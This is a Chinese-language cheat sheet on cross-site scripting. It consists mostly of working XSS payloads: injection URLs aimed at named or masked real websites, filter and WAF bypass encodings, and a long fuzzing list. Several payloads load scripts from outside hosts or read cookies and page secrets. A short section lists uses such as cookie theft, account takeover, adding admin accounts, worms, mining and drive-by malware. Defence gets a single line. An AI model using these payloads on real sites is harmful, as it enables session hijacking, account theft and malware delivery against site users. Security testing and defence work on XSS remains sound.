應用安全-Web安全-XSS(跨站攻擊)攻防整理

時間  2020-12-04
標籤 javascript php css html html5 java jquery web ajax chrome 欄目 系統安全 简体版
原文   原文鏈接

分類javascript

反射型 存儲型  DOM型  XSF(Flash XSS) PDFXSS MHTML協議跨站(MHTML,data)  字符編碼(UTF-7 XSS)
富文本編輯器測試 - 輸入框 <img SRC="http://www.baidu.com/" STYLE="xxx:expr&#x65;ssio/*\0*/n(if(!window.x){alert('xss');window.x=1;})" ALT="111" /> #style過濾不足 IE6環境 <img src=1 alt="hello,xss"onerror=alert(1);//"> #發表日誌處 反射型
(1)<script>alert(1)</script> (2)%22%3E%3Cscript%3Ealert%28/insight/%29%3C/script%3E
(3)">%3Cscript%3Ealert%28/document.cookie/%29%3C/script%3E
(4)%3Cscript%3Ealert%28%27s%27%29;%3C/script%3E
(5)</SCRIPT><SCRIPT>alert("B0mbErM@n");</SCRIPT>

(6)--"><SCRIPT>alert("B0mbErM@n");</SCRIPT>  -- 接路徑後php

(7)http://xx.xx.com.cn/front/register.jsp?lang="onerror=alert(document.cookie)%20" 存儲型 </a>javascript:alert(/x/) #如相冊名稱填寫處 <iframe/src=javascript:alert(document.cookie);> #如上傳視頻後填寫視頻信息,在視頻簡介處插入 XSS -> 獲得用戶Cookie -》 登陸網站後臺 -》 經過越權漏洞添加管理員帳號

測試瀏覽器: IE8 | IE9和Opera 關閉XSS filter | firefox 17.0.5

 

無回顯XSS - burp - Collaboratorcss

<script src="collaborator生成的隨機url"></script>

 

XSS: http://movie.x.com/type,area/a"><BODY ONLOAD=alert(188)>,1/
http://movie.x.com/type,area/a%22%3E%3CBODY%20ONLOAD=alert%28188%29%3E,1/
http://t.x.com.cn/pub/tags/"><script>alert(1)</script>
http://t.x.com.cn/pub/tags/%2522%253E%253Cscript%253Ealert(1)%253C%252Fscript%253E
http://t.x.com/tag/');alert(1)<!--
http://123.x.com/dianping/?aaaaaaaaaa"><script>alert(/wooyun/)</script>
 http://t.x.com/p/worldcup?g=1"><script>alert(document.domain)</script>
http://shaft.jebe.x.com/show?a=a<script>alert(1)</script>&r=http://www.renren.com&type=single
http://help.x.com/mutually_help_null.shtml?query=<script>alert(1)</script>
http://www.x.com/Product/SearchNew.aspx?new=1&k=aaa<script>alert('xss')</script>
http://t.x.com/p/city?s=44&c=3"><script>alert(1)</script><"
http://search.x.com/bk.jsp?title="><script>alert(1)</script><"
http://wap.x.com/sogou/go2map/?pg=GMINDEX&position="><script>alert(1)</script><"
http://**.**.**.**/api/db/dbbak.php?apptype=1%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22
http://product.x.com/simp_search.php?manuid=0&keyword=</script><script>alert(42)</script>&bgcolor=ffffff
http://play.x.com.cn/list.php?keyword=<script>alert('xss');</script>&keywords=title&x=10&y=10
http://login.x.com.cn/hd/signin.php?act=1&reference='"><script>alert("xss");</script><"&entry=sso®_entry=space
http://www.x.com/websnapshot?url='"><script>alert("我又來了—小黑");</script><"&did=093e5e25b67f3688-24a8d6236dd
http://passport.x.com/matrix/getMyCardAction.do?url='"><script>alert(9122430);</script><"&chenmi=0&macval=&hmac=
http://mail.x.com/?userid=&appid='"><script>alert(15551700);</script><"&ru=
http://toolbox.x.com/searchcode/iframe?style=4&domain='"><script>alert(15551700);</script><"
http://www.x.net/pharmacysystem.php?page="><script>alert(15551700);</script>&Proceed_=1
http://game.x.tv/astd_register.php?preurl=http://game.pps.tv/astd_register.php&cf="><script>alert(15551700);</script>
http://movies.x.com/movie_search.php?type=xss';"<script>alert(188)</script>&keyword=1
http://movies.x.com/movie_search.php?type=xss%27;%22%3Cscript%3Ealert%28188%29%3C/script%3E&keyword=1
http://movies.x.com/movie_search.php?type=search&keyword=</title><script>alert(/anyunix/)</script>
http://movies.x.com/movie_search.php?type=search&keyword=%3C/title%3E%3Cscript%3Ealert%28/anyunix/%29%3C/script%3E
http://passport.x.com/web/updateInfo.action?modifyType=';alert(/aa/);a='
http://passport.x.com/web/updateInfo.action?modifyType=%27;alert%28/aa/%29;a=%27
http://www.x.com/rp/uiserver2.asp?action=<script>alert(/xss/)</script>
http://cang.x.com/do/add?it=&iu=!--></script><script>alert(/xss/)</script>
http://cang.x.com/do/add?it=&iu=<script>alert(/xss/);</script>
http://**.**.**.**/diannao/?類型=&query=<script>alert(/xss/);</script>&cater=diannao
http://x.tv/cookie.php?act=login_tmp&success_callback="><div%20style="xss:expression(window.x?0:(eval(String.fromCharCode(97,108,101,114,116,40,39,120,115,115,39,41)),window.x=1));"></div>
http://x.com.cn/api/get_from_data.php?sid=48302&jsoncallback=jsonp1282643851243'<script>alert('s')</script>s&_=1282643881152
http://x.m.moxiu.com/index.php?do=Phone.List&fid=1&t=8<script>alert('s');</script>
http://x.sina.com.cn/list.php?client=13&clientname=<script>alert('s');</script>
http://bj.x.com/bjhcg/stock/friendkchz.asp?tp=10&group="></iframe><script>alert(/XSS/);</script>
http://hk.x.com/gtja_Report/Report/Search.aspx?type="></iframe><script>alert(/XSS/);</script>
http://hksrv1.x.com/kf.php?keyword=&arg=gtjahk&style=1\0\"\'><ScRiPt>alert(/XSS/);</ScRiPt>
http://hk2.x.com/english/gtja_Report/Report/MarketCVList.aspx?type=0&key=" style="XSS:expression(alert(/XSS/))"
http://8.show.x.com.cn/room/space.php?sid=1000040123&tab=2';</script><script>alert('by pandora ');</script><script>
http://passport.x.com/fastreg/regs1.jsp?style=black"></iframe><script>alert("pow78781");</script>
http://cgi.video.x.com/v1/user/userinfo?u=611991217;alert(/ss/)
http://t.x.com/session?username="><script>alert("xss")</script>\&password=xss&savelogin=1234
http://v.x.com/result.html?word=asdf<img src=1 onerror=alert(1)>&submit=百度一下&type=0
http://b2b.x.com/search/search.jsp?shangji=3&query=<script>alert(document.cookie)</script>
http://login.x.com.cn/sso/login.php?callback=alert(String.fromCharCode(120,115,115,101,114));//&returntype=IFRAME
http://t.x.com.cn/ajaxlogin.php?framelogin=1&callback=var aa='&retcode=101';alert('xsser');var bb='({&reason=';<!--
http://sms.x.com/GGBJ/login.php?phone=sefrefwe" /><script>alert(/ss/);</script><!--
http://tuan.x.com/beijing/life/?promoteid='"><script>alert(565902);</script><"
http://chat.x.com/robot/repositoryBrowse.jsp?title=</TITLE><body onload=alert(999)>
http://cp.x.com/login.asp?language='"><script>alert(7001645);</script><"
http://hi.x.com/?origURL='"><script>alert(123);</script><"&loginregFrom=index&ss=10101
https://auth.x.com/login/index.htm?support=&CtrlVersion=&loginScene=&personalLoginError=&goto='"><script>alert(7263974);</script><"&password=&REMOTE_PCID_NAME=_seaside_gogo_pcid&_seaside_gogo_pcid=&_seaside_gogo_=&_seaside_gogo_p=&checkCode=1111
http://game.x.tv/astd_register.php?preurl=http://game.pps.tv/astd_register.php&cf="><script>alert(9631676);</script>
http://reg.x.com/xn6205.do?ss=a&rt=a&g=');location='https://baidu.com';//  富文本框上傳圖片處,抓包,POST請求: msg=分享圖片&act=insertTwitter&pic=http://up2.upload.x.com/"abc/123/onerror=alert(); xxx.png
msg=%u5206%u4EAB%u56FE%u7247&act=insertTwitter&pic=http://up2.upload.x.com/"abc/123/onerror=alert(); xxx.png
 富文本 - 以源碼方式編輯提交 STYLE標籤未過濾 - IE6,7,8
<img SRC="http://www.x.com/" STYLE="xxx:expr&#x65;ssio/*\0*/n(if(!window.x){alert('xss');window.x=1;})" ALT="111" /> 富文本編輯發表處: <img src=1 alt="hello,xss"onerror=alert(1);//"> 文本框: <script>alert(/1/)</script>

<script>alert(/xss/)</script>

<script>alert("XSS")</script>

</style><script>alert(/xss/)</script>

<script>alert(1)</script>

"><script>alert(/a/);</script>

<script>alert(document.cookie)</script>  --如在帖子簽名處插入-》論壇發帖-》彈窗 </script><script>alert(1)</script> WooYun<img src='' onerror=alert(/poc/)>

'"><script>alert(111);</script><"

<img src="x" onerror="alert(1)"> anyunix"/></div></div></div><BODY ONLOAD=alert('anyunix')>

 "><script>alert(1)</script><"     --貼吧發帖回帖標題處 >><<script>alert(/xss/)</script>< 新建相冊專輯,名稱及描述處輸入"><script>alert(1)</script><" -> 之後編輯該相冊時觸發 --文章標題處 <script>alert('s')</script>   
 <script>alert(/xss/)</script>

 '"><script>alert("url");</script><" --插入連接文本框
 anyunix</textarea></div></div><BODY ONLOAD=alert('anyunix')></textarea>   --簽名處 我的空間的「修改樣式」功能,只是在保存前作了js判斷,並無對實質內容進行過濾,致使持久型xss。(expression(alert(1)) 在IE6,IE8下測試經過,此處有字數限制) '"><script>alert("pow78781");</script> ---註冊時用戶名處

"><script src="http://www.***.com/test.js" type="text/javascript"></script>
 可在我的博客首頁執行js代碼 詳細說明: 使用自定義模板時插入javascript,未進行任何檢查過濾。直接location.href轉向便可將訪問者博客(登陸狀態時)的博文、評論等隱藏 漏洞證實: 編輯自定義代碼,如head區域,插入 <script>http://www.x.com/user/service.php?op=poststatus&blogid=***&id=***&Status=0</script>
 我的空間DIY時可使用expression,IE六、IE7測試經過 全角字符形式expression表達式未被過濾。而全角字符形式的expression可以被IE6解析並執行,所以,該漏洞可能致使使用IE 6.0訪問sohu郵箱的用戶遭受XSS攻擊,如在郵箱處插入文本: <DIV STYLE="width: expression(alert('XSS'));"> 郵箱 - 發件人姓名 填寫</script><script>alert()</script> 郵箱 - 發件箱郵件正文 - Style標籤未過濾: <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> 郵件正文: <div style="width:exp/****/ression(alert('xsser'))">xsser</div>

1.用QQ郵箱A給QQ郵箱B發郵件,收件人,標題填好後,對郵件正文內容作一次這樣的操做:用郵件編輯器自帶的插入圖片功能,插入一個「網絡照片」(地址隨便寫,asdf也不要緊),以後在編輯器中該「插入的圖片」的後面,輸入任意html代碼便可,如<script>alert(1)</script>,發送 2.B收到郵件意圖回覆該郵件,點擊回覆時出現彈框 圖片上傳處: <img src="javascript:alert(/xxxs/)">  --僅影響IE6 圖片名稱(利用js進行CSRF): <script src=1.js></script>
<script src=http://***.com/*.js>
 在圖片中插入JS -》 上傳 - 》 顯示: <img src="" onerror="XSS" /> 在附件中插入JS -》 上傳 -》 顯示: <style> body{ width:expression(alert(/xss/)) } </style> 搜索處: <script>alert(/xxx/)</script>
"><script>alert()</script> "><script>alert(/新浪手機跨站/)</script>< "><iframe src=http://www.baidu.com></iframe> '"><script>alert("小黑來跨站");</script><"
<iframe src=https://www.baidu.com </iframe>
<iframe src=https://www.baidu.com width=500 height=90></iframe>
aa</title></head><script>alert('乖乖');</script>
" onFocus="alert('十九樓跨站') 外部導入: css導入: @import url(http://**.**.**.**/1.css); 包含遠程css文件,能夠在1.css中寫入XSS利用.
$str = preg_replace($filter, '', $str); //過濾是過濾了,但只用於判斷,沒對源輸入起做用
if(preg_match("/(expression|implode|javascript)/i", $str)) {  //並無對import、http等進行檢測
code 區域 /(expression|vbscript|javascript|import)/i IE6,IE7,IE8經過. js文件導入: http://cnmail0.x.x.com.cn/classic/rdMail.php?cb=1,</script><script src="http://XX.com/s.js"></script><script>
 http://t.x.com.cn/ajaxlogin.php?framelogin=1&callback=document.all[3].src='http://xss.com/xss.js';</script><!--
 http://123.x.com/dianping/?"><SCRIPT/*/SRC='http://ha.ckers.org/xss.js'>
 頁面跳轉觸發: 服務器端存在對參數的過濾不嚴,致使能夠經過在參數中提交帶有JavaScript代碼惡意url,在進行頁面跳轉時(如從搜索頁面進入換膚)觸發漏洞 http://www.x.com/search?q=beyond&"><script>alert('ok')</script>
漏洞觸發 code 區域 http://www.x.com/skinchooser?back_url=http://www.x.com/search?q=beyond&"><script>alert('ok')</script>
 Flash XSS swf: </script><!--><meta http-equiv="refresh" content="3;url=http://www.google.com.hk"><!--http://www.1.swf-->.swf (連接地址欄中輸入)
 連接地址: mp3連接(連接地址欄中輸入): gHK【DBA】--><script language="javascript" type="text/javascript" src="http://js.users.51.la/4209140.js"></script><!--跨站.mp3 url連接地址欄中導入js文件: '<!--><script language="javascript" type="text/javascript" src="http://js.users.51.la/4209140.js"></script><!--
 繞過長度限制: (1)Post提交表單: </title><script>alert(/1/)</script> 繞過' " 等字符實現跳轉 -》會自動轉到 http://www.hao123.com
http://cgi.x.x.com/v1/user/userinfo?u=611991217;var str=window.location.href;var es=/url=/;es.exec(str);var right=RegExp.rightContext;window.location.href=right&url=http://www.hao123.com
 做用: (1)實現網頁自動跳轉刷新 http://down.tech.x.com.cn/download/search.php?f_name=0;URL=http://www.geovisioncn.com/news" http-equiv="refresh" \\\
(2)獲取敏感數據 XSS與郵箱同域,在郵件中誘使用戶點擊可獲取郵件列表、通信錄等 (3)post發送Ajax修改我的資料,如修改郵箱爲可操做的郵箱,而後密碼找回帳號盜號 (4)獲取管理員帳號(管理員後臺查看JS腳本) (5)釣魚 (6)蠕蟲 條件:1.同域 2.登陸狀態 防護: PHP: htmlspecialchars

 

經常使用構造方法整理html

<sCript>alert(1)</scRipt> #使用的正則不完善或者是沒有用大小寫轉換函數
&lt;script&gt;alert(/xss/)&lt;/script&gt; #多用於地址欄
%253Cimg%2520src%253D1%2520onerror%253Dalert%25281%2529%253E #多重url編碼繞過
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41))</script> #字符轉ascii(unicode)十進制編碼繞過
<scr<script>rip>alalertert</scr</script>rip> #拼湊法(利用waf的不完整性,只驗證一次字符串或者過濾的字符串並不完整)
"onmousemove="alert(&#039;xss&#039;)
</textarea><script>alert('xss')</script>  <img scr=1 onerror=alert('xss')>      #當找不到圖片名爲1的文件時,執行alert('xss')   <a href=javascrip:alert('xss')>s</a>  #點擊s時運行alert('xss')   <iframe src=javascript:alert('xss');height=0 width=0 /></iframe> #利用iframe的scr來彈窗   "><script>onclick=alert(1)</script> 
<a href="#" onclick="alert(1)">s</a>            
<script>eval(location.hash.substr(1))</script>#alert('xss') <p>Sanitizing <img src=""INVALID-IMAGE" onerror='location.href="http://too.much.spam/"'>!</p> 
"<svg/onload=confirm(document.domain)> 
a"><svg/onload=prompt(1)>  "></iframe><script>alert('OPEN BUG BOUNTY');</script> 
<button onfocus=alert(/xss/) autofocus> #須要點擊button才能執行 <img src=x onerror=window.alert(1) >            
<img src=x onerror=window[‘al’%2B’ert’](1) >        
<img src=x onerror=_=alert,_(/xss/) >            
<img src=x onerror=_=alert;_(/xss/) >            
<img src=x onerror=_=alert;x=1;_(/xss/) >            
<body/onload=document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))>    
<sCrIpt srC=http://xss.tf/eeW></sCRipT> 
"<body/onload=document.write(String.fromCharCode(60,115,67,114,73,112,116,32,115,114,67,61,104,116,116,112,58,47,47,120,115,115,46,116,102,
47,101,101,87,62,60,47,115,67,82,105,112,84,62))>" #對地址進行ascii編碼,IE不支持String.fromCharCode 
<img src=x onerror=javascript:'.concat('alert(1)> #IE、XSS Auditor均沒法繞過 javascript://%250Aalert(1) #重定向+服務端對url兩次解碼(對url驗證:PHP的filter_var或filter_input函數的FILTER_VALIDATE_URL) 
javascript://%0Aalert(1) #重定向+服務端對url解碼(對url驗證:PHP的filter_var或filter_input函數的FILTER_VALIDATE_URL) 
javascript://%0A1?alert(1):0 #三目運算符 
javascript://baidu.com/%0A1?alert(1):0 #三目運算符 
12345678901<svg onload=alert(1)>    #字符長度固定-》構造僞造字符    
<script%20src%3D"http%3A%2F%2F0300.0250.0000.0001"><%2Fscript> #ascii八進制編碼繞過
<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>  #字符轉ascii十六進制編碼繞過 
<svg onload=javascript:alert(1) xmlns="https://www.test.com">       
<iframe src="java script:alert(1)" height=0 width=0 /><iframe> #webkit過濾規則繞過
<script>alert(&#039;xss&#039;)</script>
" onclick="alert(&#039;xss&#039;)
<script src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#120;&#115;&#115;&#56;&#46;&#112;&#119;&#47;&#98;&#103;&#70;&#102;&#66;&#120;&#63;&#49;&#52;&#49;&#57;&#50;&#50;&#57;&#53;&#54;&#53;"></script> (加載js文件)
<script>confirm(/v587/)</script>
'"()&%<acx><ScRiPt>alert(/xss/)</ScRiPt>
'";alert(1);//
'";alert(/xsss/)//
zaq'onmouseover=prompt(1)&gt
<svg/onload=alert(1)>
/index.jsp?vendor_id=";alert(/xss/)<!-- 

字段繞過方法整理html5

1" autofocus onfocus=alert(1) x="   #尖括號繞過/input標籤中 name=javascript:alert(1) autofocus onfocus=location=this.name   #尖括號繞過/input標籤中 location=url編碼模式可將括號寫爲%28 %29 #()繞過 this.name傳值繞過   #單引號'繞過
<SCRIPT>a=/1/alert(a.source)</SCRIPT>   #單引號、雙引號、分號繞過|尖括號、等號無法繞過 <script>{onerror=alert}throw 1</script> #引號、分號繞過 <script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41))</script>   #單引號、雙引號、分號繞過|尖括號無法繞過 <<SCRIPT>a=/1/alert(a.source)//<</SCRIPT> #<script>、單雙引號、分號繞過|等號無法繞過
<a href="java&#115;cript:alert('xss')">link</a>  #javascript繞過
<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>  #alert繞過 

可繞過IE瀏覽器檢測,沒法繞過XSS Auditor檢測構造方法整理 java

<img src=1 onerror=alert(document.domain)>    
<video src=1 onerror=alert(/xss/)> 
<audio src=x onerror=alert(/xss/)> 
<body/onfocus=alert(/xss/)> 
<input autofocus onfocus=alert(1)> #需點擊觸發 <svg onload=location=alert(1)> 
<svg onload=javascript:alert(1)> 
<button onfocus=prompt(1) autofocus> #需點擊觸發 <select autofocus onfocus=prompt(1)> #需點擊觸發 "<svg/onload=alert(1)>"@x.y 針對郵件地址檢測構造XSS(if(!filter_var($email, FILTER_VALIDATE_EMAIL))) <script>alert('xss')</script><svg/onload=setTimeout(alert(1))><img src=1 onerror=constructor.constructor(alert(1))> 
<img src=1 onerror=[1].map(alert)> 
<img src=1 onerror=[1].filter(alert)> 
<img src=1 onerror=alert(document.domain)> 
<svg/onload=setTimeout(String.fromCharCode(97,108,101,114,116,40,49,41))> 
<body/onload=document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114>  #對<script>alert(1)</script>ascii編碼 <body/onfocus=_=alert,_(123)>

利用details | 目前只有 Chrome, Safari 6+, 和 Opera 15+ 瀏覽器支持 | chrome Auditor沒法繞過" | eval攔截可對alert(1) 八進制編碼jquery

<details open ontoggle=top.alert(1)>     
<details open ontoggle=top['alert'](1)>    
<details open ontoggle=top[‘prompt’](1)>    
<details open ontoggle=top[‘al’%2b’ert’](1)>    
<details open ontoggle=top.eval(‘ale’%2B’rt(1)’) >
<details open ontoggle=top.eval(‘ale’%2B’rt(1)’) >    
<details open ontoggle=eval(‘alert(1)’) >    
<details open ontoggle=eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029') >    
<details open ontoggle=eval(atob(‘YWxlcnQoMSk=’)) >    
<details open ontoggle=\u0065val(atob(‘YWxlcnQoMSk=’)) >    
<details open ontoggle=%65%76%61%6c(atob(‘YWxlcnQoMSk=’)) >    "    
<details open ontoggle=eval('%61%6c%65%72%74%28%31%29') >    
<details open ontoggle=eval(‘\141\154\145\162\164\50\61\51’) >    
<details open ontoggle=eval(String.fromCharCode(97,108,101,114,116,40,49,41)) > #外部url,運用基於DOM的方法建立和插入節點把外部JS文件注入到網頁並進行url編碼 <details open ontoggle=eval(「appendChild(createElement(‘script’)).src=’http://xss.tf/eeW'」)> 
<details open ontoggle=eval(%61%70%70%65%6e%64%43%68%69%6c%64%28%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%29%2e%73%72%63%3d%27%68%74%74%70%3a%2f%2f%78%73%73%2e%74%66%2f%65%65%57%27) >

繞過檢測規則/waf方法整理web

客戶端繞過 - waf部署在客戶端上,利用burp、fiddler繞過

USER-Agent僞造繞過 - 對百度、google、soso、360等爬蟲請求不過濾的狀況下
cookie構造繞過 - $_REQUEST接受get post cookie,waf過濾GET POST

IP代理繞過 - 網站顯示IP或瀏覽器,可對IP、user-agent進行構造,在PHP裏X_FORWARDED_FOR和HTTP_CLIENT_IP兩個獲取IP的函數可被修改

插件繞過 - 過任意waf/支持跨域

編碼繞過 - HTML、Unicode、URL、ASCII、JS編碼、base64

字符實體繞過
利用webkit過濾規則繞過

參數污染繞過(主要用於搜索引擎)
 http://127.0.0.1:631/admin/?kerberos=onmouseover=alert(1)&kerberos

註釋符繞過

      input1#value: "><!--
      input2#value: --><script>alert(/xss/);<script/>ajax

 

外部引入css腳本繞過chrome

 

結合服務器編碼語言繞過

 

配合代碼邏輯繞過


編碼語言漏洞/框架漏洞  - 如 Jquery 中 html()方法 -  Apache||Nginx訪問日誌攻擊
a.cn/test/?text=<script>alert(1)</script>   #Nginx,後端Apache

外部引入css腳本整理

<!DOCTYPE HTML>
<html>
<head>
<style> @import url("malicious.css"); </style>

<title>TEST</title>
<meta charset="utf-8">
</head>
<body > There is a will!
</body>
</html> body{ color:expression(alert('xss')); }
View Code

移動端構造方法整理

#ontouch*handlers <body ontouchstart=alert(45)>
<body ontouchend=alert(45)>
<body ontouchmove=alert(45)>

 Cookie繞過整理

Cookie中添加 style: wrewrwrwrwrafas"><script>alert(1)</script><!--

配合代碼邏輯繞過整理

');%0a}%0d}%09alert();/*anything here*/if(true){//anything here%0a('

');}}alert();if(true){(' 場景 function example(age, subscription){ if (subscription){ if (age > 18){ another_function('');}}alert();if(true){(''); } else{ console.log('Requirements not met.'); } } 執行 -》 function example(age, subscription){ if (subscription){ if (age > 18){ another_function(''); } } alert(); if (true){ (''); } else{ console.log('Requirements not met.');

 

工具篇

XSpear

 

利用篇

插入惡意代碼 - 工具 - 桂林老兵cookie欺騙
 <img src=x onerror=appendChild(createElement('script')).src='js_url' />  
第三方劫持 (外調J/C)
 XSS downloader
 XCS
 頁面渲染XSS
 跨域攻擊
 挖礦
 DDOS攻擊
 獲取Cookie
 內網IP端口存活主機信息獲取
 截屏
 獲取後臺地址(存儲型XSS)

掛馬

(1)反射型 -  %3Ciframe+src%3Dhttp%3A%2F%2Fwww.tkwoo.com+width%3D0+height%3D0%3E%3C%2Fiframe%3E+

 

 

Fuzzing篇

 

<svg onload=alert(1)>"><svg onload=alert(1)//

"onmouseover=alert(1)//
 "autofocus/onfocus=alert(1)//
 '-alert(1)-'
 '-alert(1)//
 \'-alert(1)//
 </script><svg onload=alert(1)>
 <x contenteditable onblur=alert(1)>lose focus! 
 <x onclick=alert(1)>click this! 
 <x oncopy=alert(1)>copy this! 
 <x oncontextmenu=alert(1)>right click this! 
 <x oncut=alert(1)>copy this! 
 <x ondblclick=alert(1)>double click this! 
 <x ondrag=alert(1)>drag this! 
 <x contenteditable onfocus=alert(1)>focus this! 
 <x contenteditable oninput=alert(1)>input here! 
 <x contenteditable onkeydown=alert(1)>press any key! 
 <x contenteditable onkeypress=alert(1)>press any key! 
 <x contenteditable onkeyup=alert(1)>press any key! 
 <x onmousedown=alert(1)>click this! 
 <x onmousemove=alert(1)>hover this! 
 <x onmouseout=alert(1)>hover this! 
 <x onmouseover=alert(1)>hover this! 
 <x onmouseup=alert(1)>click this! 
 <x contenteditable onpaste=alert(1)>paste here!
 <script>alert(1)// 
 <script>alert(1)<!
 <script src=//brutelogic.com.br/1.js> 
 <script src=//3334957647/1>
 %3Cx onxxx=alert(1) 
 <%78 onxxx=1 
 <x %6Fnxxx=1 
 <x o%6Exxx=1 
 <x on%78xx=1 
 <x onxxx%3D1
 <X OnXxx=1 
 <x onxxx=1 onxxx=1
 <x/onxxx=1 
 <x%09onxxx=1 
 <x%0Aonxxx=1 
 <x%0Conxxx=1 
 <x%0Donxxx=1 
 <x%2Fonxxx=1 
 <x 1='1'onxxx=1 
 <x 1="1"onxxx=1
 <x </onxxx=1 
 <x 1=">" onxxx=1 
 <http://onxxx%3D1/
 <x onxxx=alert(1) 1='
 <svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>
 'onload=alert(1)><svg/1='
 '>alert(1)</script><script/1=' 
 */alert(1)</script><script>/*
 */alert(1)">'onload="/*<svg/1='
 `-alert(1)">'onload="`<svg/1='
 */</script>'>alert(1)/*<script/1='
 <script>alert(1)</script> 
 <script src=javascript:alert(1)> 
 <iframe src=javascript:alert(1)> 
 <embed src=javascript:alert(1)> 
 <a href=javascript:alert(1)>click 
 <math><brute href=javascript:alert(1)>click 
 <form action=javascript:alert(1)><input type=submit> 
 <isindex action=javascript:alert(1) type=submit value=click> 
 <form><button formaction=javascript:alert(1)>click 
 <form><input formaction=javascript:alert(1) type=submit value=click> 
 <form><input formaction=javascript:alert(1) type=image value=click> 
 <form><input formaction=javascript:alert(1) type=image src=SOURCE> 
 <isindex formaction=javascript:alert(1) type=submit value=click> 
 <object data=javascript:alert(1)> 
 <iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;> 
 <svg><script xlink:href=data:,alert(1) /> 
 <math><brute xlink:href=javascript:alert(1)>click 
 <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&> 
<html ontouchstart=alert(1)> 
 <html ontouchend=alert(1)> 
 <html ontouchmove=alert(1)> 
 <html ontouchcancel=alert(1)>
 <body onorientationchange=alert(1)>
 "><img src=1 onerror=alert(1)>.gif
 <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
 GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
 <script src="data:&comma;alert(1)//
 "><script src=data:&comma;alert(1)//
 <script src="//brutelogic.com.br&sol;1.js&num; 
 "><script src=//brutelogic.com.br&sol;1.js&num; 
 <link rel=import href="data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; 
 "><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;
 <base href=//0>
 <script/src="data:&comma;eval(atob(location.hash.slice(1)))//#alert(1)
 <body onload=alert(1)>
 <body onpageshow=alert(1)>
 <body onfocus=alert(1)>
 <body onhashchange=alert(1)><a href=#x>click this!#x
 <body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
 <body onscroll=alert(1)><br><br><br><br>
<body onresize=alert(1)>press F12!
 <body onhelp=alert(1)>press F1! (MSIE)
 <marquee onstart=alert(1)>
 <marquee loop=1 width=0 onfinish=alert(1)>
 <audio src onloadstart=alert(1)>
 <video onloadstart=alert(1)><source>
 <input autofocus onblur=alert(1)>
 <keygen autofocus onfocus=alert(1)>
 <form onsubmit=alert(1)><input type=submit>
 <select onchange=alert(1)><option>1<option>2
 <menu id=x contextmenu=x onshow=alert(1)>right click me!
 alert`1`
 alert&lpar;1&rpar;
 alert&#x28;1&#x29
 alert&#40;1&#41
 (alert)(1)
 a=alert,a(1)
 [1].find(alert)
 top["al"+"ert"](1)
 top[/al/.source+/ert/.source](1)
 al\u0065rt(1)
 top['al\145rt'](1)
 top['al\x65rt'](1)
 top[8680439..toString(30)](1)
 navigator.vibrate(500)
 eval(URL.slice(-8))>#alert(1)
 eval(location.hash.slice(1)>#alert(1)
 innerHTML=location.hash>#<script>alert(1)</script>
 '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
 <<scr\0ipt/src=http://xss.com/xss.js></script
 %27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
 ' onmouseover=alert(/XSS/)
 "><iframe%20src="http://google.com"%%203E
 '<script>window.onload=function(){document.forms[0].message.value='1';}</script>
 x」</title><img src%3dx onerror%3dalert(1)>
 <script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script>
 <script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>
 <script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script> 
<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script> 
<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> 
<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script> 
<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>
 <script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>
